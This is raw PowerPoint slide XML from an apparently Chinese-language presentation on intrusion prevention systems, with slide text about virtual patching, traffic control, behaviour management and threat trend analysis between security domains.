          <p:nvGrpSpPr>
            <p:cNvPr id="59" name="组合 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249FCDFF-F1AC-3477-6288-A26D53C8130B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="67" name="图片 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D9E46B-CB5B-7746-3F5A-070C5C5AE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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E7952E-7D91-7DAC-92C9-7F6A08865266}"/>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70" name="组合 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3284629F-77D0-83E1-4331-D5A0803A33DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1070041" y="3092650"/>
            <a:ext cx="6848475" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10785" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5382A86-36A5-579B-9468-52522C661680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="984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为已知漏洞提供虚拟补丁（重点）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="72" name="组合 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCCB63F-398E-61AE-BB5F-07AA05D673F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="73" name="图片 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CEA7A9-7E3B-13C3-4ABE-C61260611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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D71C1EE-A87A-A311-20FF-29826BF1DDF4}"/>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93D6A5C4-EEFB-5861-BDCD-7F8DB4A7B638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1104106" y="3678430"/>
            <a:ext cx="3906520" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53FB56BD-6DBE-7058-691A-E584FE116914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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速率或流量控制</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="77" name="组合 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2648985B-9974-BC7A-44D4-C7F232A6B9AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="78" name="图片 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C908C8E-0148-340D-FC2B-A3EF8BA0D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9" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5E8E7C-A778-D884-F812-057B6436A14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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DFF402-9CFF-96FE-BB38-F0EA16E4D520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5120264" y="2443560"/>
            <a:ext cx="6110854" cy="1627646"/>
            <a:chOff x="975" y="935"/>
            <a:chExt cx="3402" cy="803"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Picture 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D134286-C16C-333A-41A9-B2E52722B7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 y="935"/>
              <a:ext cx="1285"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2" name="Picture 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6194BD-BC5C-F4AA-AF9F-6D292B2D4E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2" y="955"/>
              <a:ext cx="1285"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43" name="直接连接符 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D478A68-032B-4106-10C6-9B1A96AFD193}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2290" y="1327"/>
              <a:ext cx="902" cy="2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44" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CCCD5F3-AB10-ED51-E1FC-FA3FE0FDABC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2472" y="1206"/>
              <a:ext cx="453" cy="272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IPS</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B6F01B3-8211-FE32-6E67-718FEB5F7937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5469751" y="2930442"/>
            <a:ext cx="1324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r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全域</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099530CD-E339-B75A-9212-B0DFD8177E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9525422" y="2941525"/>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5"/>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r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全域</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="组合 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A633A07-8353-90D9-7A8C-0406978AABA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1124977" y="4288215"/>
            <a:ext cx="3906520" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8891A392-6C25-7AC7-307A-E2F9CDA00821}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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行为管理</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="组合 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94AC546B-B737-9889-8958-F4A88B5E59CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="图片 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3639C97-66EE-9A00-CA85-FF80A6BD24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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54749ED4-F6DE-2F81-568A-5DA8B58F76F9}"/>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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="文本框 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0205085E-0C79-4E95-4E6C-70C1AE4DFC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724786" y="5063263"/>
            <a:ext cx="8662752" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可提供有效的、防火墙无法提供的应用层安全防护功能。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>但为了避免误报，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对未知攻击的防御能力几乎没有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A491E46D-DEAF-442C-A236-844C943E2A10}"/>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37291788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D7A520C9-4610-22C8-BA97-649D29B5AB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985254" y="2262925"/>
            <a:ext cx="7471410" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="11766" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180DF504-6E52-1DBD-BDF2-91A8E8744749}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="10821"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总体威胁趋势分析（重点）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="59" name="组合 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249FCDFF-F1AC-3477-6288-A26D53C8130B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="67" name="图片 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D9E46B-CB5B-7746-3F5A-070C5C5AE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69" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E7952E-7D91-7DAC-92C9-7F6A08865266}"/>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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="组合 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3284629F-77D0-83E1-4331-D5A0803A33DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985254" y="2844223"/>
            <a:ext cx="6848475" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10785" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5382A86-36A5-579B-9468-52522C661680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9840"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流量及连接分析（重点）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="72" name="组合 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCCB63F-398E-61AE-BB5F-07AA05D673F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="73" name="图片 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CEA7A9-7E3B-13C3-4ABE-C61260611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4" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D71C1EE-A87A-A311-20FF-29826BF1DDF4}"/>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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75" name="组合 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D6A5C4-EEFB-5861-BDCD-7F8DB4A7B638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1006356" y="3380086"/>
            <a:ext cx="3906520" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53FB56BD-6DBE-7058-691A-E584FE116914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="5207" cy="623"/>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buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
